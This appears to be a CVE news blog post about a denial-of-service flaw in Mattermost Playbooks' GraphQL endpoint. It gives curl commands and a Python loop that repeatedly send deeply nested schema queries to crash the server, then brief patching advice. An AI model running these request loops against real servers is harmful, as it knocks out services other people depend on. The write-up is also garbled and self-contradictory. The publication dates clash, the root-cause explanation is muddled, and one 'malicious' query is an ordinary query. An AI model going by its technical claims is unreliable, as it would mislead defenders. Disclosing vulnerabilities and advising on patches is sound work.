CVE CyberSecurity Database News

CVE-2024-47401 - Amplified GraphQL Response in Mattermost Playbooks Can Crash Your Server

Poster -

On May 8, 2024, a new vulnerability—CVE-2024-47401—was published, affecting several versions of Mattermost, the popular open-source collaboration and messaging platform. This vulnerability can let anyone trigger a colossal response from the GraphQL API via the Playbooks feature, overloading system resources and potentially crashing the entire application.

This post explains the vulnerability in simple language, presents code snippets and a proof-of-concept exploit, and cites original references. If your organization uses Mattermost, especially Playbooks, this is a critical issue to understand.

What is Mattermost Playbooks?

Mattermost Playbooks is a workflow automation tool that allows teams to automate processes, manage incidents, and share repeatable checklists—all deeply integrated within Mattermost channels. Playbooks are heavily used in incident response, release cycles, and compliance reporting.

Vulnerability Details

Normally, applications hide detailed error messages from users to avoid leaking sensitive data, or prevent attackers from using them in denial-of-service (DoS) attacks. But in vulnerable versions of Mattermost, the Playbooks plugin's GraphQL endpoint fails to block overly detailed error messages. An attacker can craft a request that triggers a massive, verbose error response. When repeated, this behavior eats up server memory and can cause the application (or underlying system) to crash.

Why is This Vulnerable?

The vulnerability exists because the Playbooks GraphQL API padlocks its mouth after evaluating a user's malformed or abusive request—meaning it spits out the whole error stack or unwittingly creates massively-nested error responses.

Malformed GraphQL query → triggers recursive error reporting → Huge response payload.

If this is repeated, the server is stuck endlessly crafting these massive error reports, soon gobbling up all memory or CPU, and eventually crashing.

Sample Malicious GraphQL Query

Below is a simple cURL command that exploits this issue by intentionally nesting a Playbooks query. We’re requesting deeply nested resources, tripping the error handler into producing an enormous response:

curl -X POST https://your.mattermost.server/plugins/playbooks/api/v1/graphql \
     -H "Content-Type: application/json" \
     -d '{ "query": "query { playbooks { nodes { name description steps { name description actions { name } } } } }" }'

For extra impact, attackers will intentionally mistake the schema or request deeply, forcing infinite or recursive error descriptions:

curl -X POST https://your.mattermost.server/plugins/playbooks/api/v1/graphql \
     -H "Content-Type: application/json" \
     -d '{ "query": "{ __schema { types { fields { name type { fields { name type { fields { name } } } } } } } }" }'

The above query asks GraphQL for a deeply-nested schema report—more than the server can handle gracefully. The error generated will include mountains of type and field descriptions.

These responses balloon in size—dozens of megabytes per request.

- If repeated, the server's memory and/or CPU are consumed, leading to a denial of service or total crash.

Here’s a Python snippet to loop the attack

import requests

url = 'https://your.mattermost.server/plugins/playbooks/api/v1/graphql'
payload = {
    "query": "{ __schema { types { fields { name type { fields { name type { fields { name } } } } } } } }"
}
headers = {'Content-Type': 'application/json'}

# Send the malicious query in a loop
for i in range(100):
    resp = requests.post(url, json=payload, headers=headers)
    print(f"[{i}] Response length: {len(resp.text)}")

Mitigation & Patching

Upgrade immediately!

9.5.10

You can find upgrade guidance here:
- Mattermost Changelog
- Mattermost Security Updates

Disable the Playbooks plugin if not critical.

- Use a WAF (Web Application Firewall) to filter POST requests to /plugins/playbooks/api/v1/graphql.

References

- Official CVE Record: CVE-2024-47401
- Mattermost Security Portal
- Playbooks Feature Documentation

Conclusion

CVE-2024-47401 is a serious vulnerability that could let an attacker crash your Mattermost server using nothing more than some clever (or malicious) GraphQL queries. By failing to properly sanitize error output, the Playbooks plugin lets attackers “amplify” server responses beyond safe limits.

The solution is simple—patch your Mattermost server! If you run Playbooks and can't upgrade immediately, consider disabling the plugin or blocking GraphQL access until you're protected.

*Stay safe, and keep your collaboration tools patched!*

Timeline

Published on: 10/29/2024 09:15:07 UTC
Last modified on: 10/29/2024 14:34:04 UTC